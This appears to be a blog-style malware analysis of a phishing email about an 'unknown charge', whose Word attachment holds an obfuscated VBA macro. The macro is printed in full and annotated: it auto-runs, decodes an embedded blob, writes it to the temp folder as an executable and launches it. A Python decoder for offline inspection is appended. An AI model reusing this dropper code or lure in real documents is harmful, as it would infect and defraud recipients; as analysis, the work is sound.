I received the following email from our address on a client's system (with their email domain name redacted):
From: denise@chefspecialties.com [mailto:denise@chefspecialties.com]
Sent: Thursday, June 16, 2016 6:36 AM
Subject: Re: unknown charge on my card
What is this $816.27 charge on my credit card?
It shows this amount charged by <REDACTED DOMAIN NAME>.
Please check the screenshot i have attached and tell me what is this about?
Thank you
Denise Allen
Chef Specialties
P: 814.3217085
F: 814.2353106
The email also included an attachment “<REDACTED DOMAIN NAME>_card_screenshot.doc” that showed as follows:
Enable content to adjust this document to your version of Microsoft Word
The document contained three chunks of VBA code:
Microsoft Word Objects – ThisDocument
Public Sub AutoOpen()
    Dim bishop As String
    Dim anorexy As Long
    Dim corkscreq As Integer
    Dim precentor As Variant
    corkscreq = Sin(19)
    If corkscreq < 7 + 41 - 463 Then   ' never true, so PrintAll is dead filler
        PrintAll
    Else
        Dim unforbidden As String
        ich = catholic.Visible   ' touching the form fires UserForm_Initialize -> certificate.cheep
        For niggling = 20 To 71
            addiction = 71
            alpenstock = Lcase("CON") & Ucase("deMnE") & StrReverse("d")
            alpenstock = Ucase("Te") + StrReverse("ikayir")
        Next niggling
    End If
End Sub

Sub PrintAll()
    Dim aDoc As Document
    For Each aDoc In Documents
        aDoc.PrintOut
    Next
End Sub

' Never called; looks like a documentation sample pasted in as filler.
Sub InsertParagraphMethod()
    Dim MyRange As Object
    Set MyRange = ActiveDocument.Range
    ' Selection Example:
    Selection.InsertParagraph
    ' Range Example:
    MyRange.Collapse Direction:=wdCollapseStart
    MyRange.InsertParagraph
End Sub
Forms – catholic
Sub UserForm_Initialize()
    If Sin(3) <> 30 Then   ' always true
        certificate.cheep
    End If
End Sub
Modules – Certificate
' Opens the drop path for binary write on the supplied file number.
Sub congenially(palate, anodyne)
    Open palate For Binary Access Read Write As #anodyne
End Sub

' Decoder for the embedded blob: XOR every byte with 18, then base64-decode.
Function harumscarum(disputes) As String
    Dim dizzard As Long
    Dim respectableness As Integer
    Dim pinscher As String
    Dim gynecaeum(63) As Long
    Dim dios As Long
    Dim loquaciously() As Byte
    Dim concavely As Long
    Dim fringillidae(63) As Long
    Dim ahead As Long
    Dim poncho() As Byte
    Dim climb(63) As Long
    Dim conditional(255) As Byte
    septrional = 4096        ' 2^12
    algal = 4032
    bebas = 65 + 60 - 72 + 65227   ' &HFF00
    fiat = 16711680          ' &HFF0000
    crispinus = 262144       ' 2^18
    rive = 63
    ordination = 50 + 16515022
    harken = 258048
    eupatorium = 44 + 211    ' &HFF
    crescent = 103 + 153     ' 256
    lyginopteris = 64        ' 2^6
    nimiety = 1 - 110 + 65645   ' 65536
    Dim rousseauan As Variant
    Dim asexual() As Byte
    asexual = StrConv(disputes, vbFromUnicode)
    Dim percina As Integer
    For cates = 0 To UBound(asexual)
        asexual(cates) = asexual(cates) Xor 18   ' strip the XOR layer first
    Next cates
    For bicuspid = 23 To 53
        redbud = 53
        excipiendis = Right("livelinessgy", 2) + "psum"
        excipiendis = "no" + Mid("richesnelectivelisting", 7, 9)
    Next bicuspid
    pasigraphy = StrConv(asexual, vbUnicode)
    respectableness = 2
    ' Standard base64 alphabet lookup; every other byte (including "=") stays 0.
    For dizzard = 0 To 255
        Select Case dizzard
            Case 65 To 90
                conditional(dizzard) = dizzard - 65
            Case 97 To 122
                conditional(dizzard) = dizzard - 71
            Case 48 To 57
                conditional(dizzard) = dizzard + 4
            Case 43
                conditional(dizzard) = 62
            Case 47
                conditional(dizzard) = 63
        End Select
    Next dizzard
    For dizzard = 0 To 63
        gynecaeum(dizzard) = dizzard * lyginopteris
        fringillidae(dizzard) = dizzard * septrional
        climb(dizzard) = dizzard * crispinus
    Next dizzard
    loquaciously = StrConv(pasigraphy, vbFromUnicode)
    afric = 43 - 39
    ReDim poncho((((UBound(loquaciously) + 1) \ afric) * 3) - 1)
    ' Four base64 characters -> one 24-bit value -> three output bytes.
    For ahead = 0 To UBound(loquaciously) Step 4
        concavely = climb(conditional(loquaciously(ahead))) + fringillidae(conditional(loquaciously(ahead + 1))) + _
            gynecaeum(conditional(loquaciously(ahead + 2))) + conditional(loquaciously(ahead + 3))
        dizzard = concavely And fiat
        poncho(dios) = dizzard \ nimiety
        dizzard = concavely And bebas
        poncho(dios + 1) = dizzard \ crescent
        poncho(dios + 2) = concavely And eupatorium
        dios = dios + 3
    Next ahead
    pinscher = StrConv(poncho, vbUnicode)
    ' The last two decoded bytes are always replaced by two NULs.
    If respectableness Then pinscher = Left$(pinscher, Len(pinscher) - respectableness) + vbNullChar + vbNullChar
    harumscarum = pinscher
End Function

' CallByName(WScript.Shell, "run", VbMethod, path)
Sub balanoposthitis(asthenosphere, v)
    Dim psychopharmacological As Variant
    Set whig = asthenosphere
    holiness = 119 - 118   ' 1 = VbMethod
    If Sin(holiness) <> 68 Then
        forfeiture = Lcase("RU") & Right("goodkinghenryn", 1)   ' "run"
    Else
        forfeiture = "drawbridge"
    End If
    novo = CallByName(whig, forfeiture, holiness, v)
End Sub

' Writes the decoded bytes to the already-open file number.
Public Sub plow(gable, ByRef up, aerially, compulsatory)
    Dim nosiness As Byte
    Dim catalyst() As Byte
    Dim heft As String
    catalyst = classificatory(aerially)
    chicote = queen
    beaujolais = up
    Put #beaujolais, , catalyst
End Sub

' Never called; documentation-sample filler.
Sub HeaderFooterProperty()
    Dim MyText As String
    MyText = "<Replace this with your text>"
    ActiveWindow.ActivePane.View.SeekView = wdSeekCurrentPageHeader
    Selection.HeaderFooter.Range.Text = "MyText"
    ActiveWindow.ActivePane.View.SeekView = wdSeekMainDocument
End Sub

' Main chain. Only the Case that matches the constant is live; the other
' branches in each Select Case are dead filler.
Sub cheep()
    turnery = 62
    Select Case turnery
        Case 18 To 21
            Dim aeequa As String
            Dim elanus As Variant
            articulate = StrReverse("wol") + Left("landerescription", 5) + Left("rplastering", 1)
        Case 62
            competitiveness = "fogged"
            Dim capricornis As String
            Dim catwalk As String
    End Select
    ambulacrum = 25 + 51
    Select Case ambulacrum
        Case 2 To 5
            Dim misery As Variant
            Dim aequa As Byte
            bezel = "br" + "evis"
        Case 8 To 14
            Dim avast As Byte
            Dim spyeria As Variant
            training = pennyroyal
        Case 76
            capricornis = strelitzia   ' temp folder path
            Dim descendent As String
            ' <temp folder>\bilateraliTY.EXE
            catwalk = capricornis + "\" + Mid("caffeinebilfolderol", 9, 3) + StrReverse("ilareta") + Ucase("tY.EXe")
    End Select
    poronotus = 39 + 29
    Select Case poronotus
        Case 14 To 15
            Dim measurable As Integer
            Dim scophthalmus As Variant
            boatswain = illuminations
        Case 33 To 38
            Dim snowwhite As String
            Dim hellbent As Long
            frangi = troubled
        Case 68
            brawn = Mid("syllabicatecusceloporus", 12, 2) & "cumi" & Lcase("S")
            berlin = FreeFile   ' file number for the dropped file
            myacidae = 0
    End Select
    countryside = 65
    Select Case countryside
        Case 39 To 42
            Dim trinkgeld As Variant
            Dim chambered As Long
            razorsharp = accolade
        Case 10 To 14
            Dim whereby As Byte
            Dim cage As Integer
            atoms = StrReverse("hw") & StrReverse("teti") & Left("hornimpatience", 4)
        Case 65
            belching = myacidae
    End Select
    congenially catwalk, berlin                 ' open the drop path
    indicative = catholic.alstroemeriaceae      ' obfuscated blob held in a control on the form
    melopsittacus = indicative
    autotomic = harumscarum(melopsittacus)      ' decode it
    opportune = Ucase("mEd") + Left("iatorsqueegee", 5) + Mid("lindleyialimpractical", 8, 3)
    cassiopeia = Left("chcontractually", 2) & Lcase("EaP")
    cassava = nondigestible
    clearness = 51
    Select Case clearness
        Case 37 To 44
            Dim angloamerican As Long
            Dim losings As Byte
            ho = "ch" + "elicerous"
        Case 20 To 21
            Dim dynamics As String
            Dim indorsement As Integer
            tegatur = Right("fancyver", 3) & StrReverse("socur") & Lcase("e")
        Case 51
            adhibit = plum
            lubricitate = Len(autotomic)
            Call certificate.plow(autotomic, berlin, autotomic, indicative)   ' write it to disk
            locomotion = piments
    End Select
    If atn(23) > 52 Then
        accumulate = Lcase("IntE") & "rdicti" & "on"
    Else
        mammea = neuromotor
        Close #berlin
    End If
    bluestone = 63 - 35 + 37
    Select Case bluestone
        Case 20 To 26
            Dim nagami As Byte
            Dim cricetus As Integer
            methylated = Left("polyautarchic", 4) + StrReverse("ihprom") + StrReverse("ms")
        Case 34 To 42
            Dim masted As Long
            Dim color As String
            isoleucine = Mid("discorscyraison", 8, 2) & "nanc" & StrReverse("eh")
        Case 65
            Set abutment = CreateObject("WScript.Shell")
    End Select
    balanoposthitis abutment, catwalk   ' run the dropped file
End Sub

' StrConv(x, 128) is vbFromUnicode: string -> byte array.
Function classificatory(excavate)
    Dim dhulhijja As Byte
    Dim general As Integer
    Dim mineralogy As Long
    amazona = StrConv(excavate, 128)
    hermannia = shoji
    column = materialistically
    dislike = deadened
    homocercal = StrReverse("ta") & Mid("polariscopetributedsoapberry", 12, 8)
    classificatory = amazona
End Function

' Never called; documentation-sample filler.
Sub FormatTablesSelect()
    Dim oTb As Table
    For Each oTb In ActiveDocument.Tables
        Select Case oTb.Style
            Case "Light Shading - Accent 4"
                oTb.AutoFitBehavior (wdAutoFitFixed)
                oTb.Rows.Alignment = wdAlignRowCenter
                oTb.Columns.PreferredWidth = InchesToPoints(0.6)
            Case "Medium List 2 - Accent 4"
                oTb.AutoFitBehavior (wdAutoFitWindow)
                oTb.Rows.Alignment = wdAlignRowLeft
            Case "Table Grid", "Table Normal"
                oTb.Style = "Light Grid - Accent 4"
            Case Else
                oTb.Style = "Medium List 1 - Accent 4"
        End Select
    Next oTb
End Sub

' Returns the temp folder: Scripting.FileSystemObject.GetSpecialFolder(2).
Function strelitzia()
    Dim elettaria As Variant
    Dim immolation As Byte
    acetous = "Scr" + StrReverse("nitpi") + StrReverse(".g")       ' "Scripting."
    nonprofit = Lcase("fILE") + "System" + Ucase("obJeCt")          ' "fileSystemOBJECT"
    If cos(89) > 68 Then
        unoffending = counterrevolutionary
    Else
        nh = acetous + nonprofit
        Dim established As Integer
        Set remiform = VBA.CreateObject(nh)
    End If
    biretta = 41 - 79 + 39   ' 1 = VbMethod
    strelitzia = CallByName(remiform, "GetSpecialFolder", biretta, 93 + 40 - 29 - 102)   ' 2 = TemporaryFolder
End Function
This code seems to take an object/blob from within the Word document (), decode and save the object/blob as a file (bilateraliTY.EXE), then execute it. A quick search for “bilateraliTY.EXE” brings up the following link from Payload Security:
The next step in investigating this malware would be dissecting the binary which is currently beyond my skills and/or level of caring.
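As an added example that is not part of the original post, here is a Python re-implementation of the decoding done by harumscarum(), so the bytes the macro writes to bilateraliTY.EXE can be recovered from the form control's text offline, without opening the document, and hashed or inspected. The XOR key 18, the base64 lookup table and the final two-byte NUL replacement are taken from the macro above; the sample blob is constructed here as a stand-in, since the real embedded payload is not reproduced.

```python
import base64

XOR_KEY = 18        # the "Xor 18" loop in harumscarum()
TRAILING_DROP = 2   # "respectableness = 2": last two output bytes become NULs

def _sextet(c: int) -> int:
    """Mirror the macro's 'conditional' table: the standard base64 alphabet,
    with every other byte (including the '=' pad) mapping to 0."""
    if 65 <= c <= 90:
        return c - 65        # 'A'..'Z' -> 0..25
    if 97 <= c <= 122:
        return c - 71        # 'a'..'z' -> 26..51
    if 48 <= c <= 57:
        return c + 4         # '0'..'9' -> 52..61
    if c == 43:
        return 62            # '+'
    if c == 47:
        return 63            # '/'
    return 0

def decode_payload(form_text: bytes) -> bytes:
    """Re-implementation of harumscarum(): XOR every byte with 18, turn each
    group of four base64 characters into three bytes (the climb/fringillidae/
    gynecaeum tables are shifts by 18, 12 and 6 bits), then replace the last
    two bytes with NULs, exactly as the macro does before Put # writes them."""
    b64 = bytes(b ^ XOR_KEY for b in form_text)
    if len(b64) % 4:
        # the macro indexes ahead+1..ahead+3 and would fail on a short group
        raise ValueError("obfuscated blob length is not a multiple of 4")
    out = bytearray()
    for i in range(0, len(b64), 4):
        v = ((_sextet(b64[i]) << 18) | (_sextet(b64[i + 1]) << 12)
             | (_sextet(b64[i + 2]) << 6) | _sextet(b64[i + 3]))
        out += bytes(((v >> 16) & 0xFF, (v >> 8) & 0xFF, v & 0xFF))
    return bytes(out[:-TRAILING_DROP]) + b"\x00" * TRAILING_DROP

def is_lossless(payload_len: int) -> bool:
    """The file written to disk equals the embedded payload plus two NULs only
    when the base64 text ends in '==' (payload length 1 mod 3); for any other
    length the fixed two-byte drop truncates real bytes, which matters when
    comparing a hash of the dropped file against a hash of the embedded blob."""
    return payload_len % 3 == 1

# Constructed stand-in for the real embedded blob, which is not reproduced:
# a fake MZ header plus text, obfuscated the same way the macro expects.
SAMPLE_EXE = b"MZ\x90\x00" + b"constructed stand-in, not a real binary"
SAMPLE_FORM_TEXT = bytes(b ^ XOR_KEY for b in base64.b64encode(SAMPLE_EXE))
```

Feed decode_payload() the text of the form control the macro reads (catholic.alstroemeriaceae) and the result is byte-for-byte what the macro drops into the temp folder, two trailing NULs included.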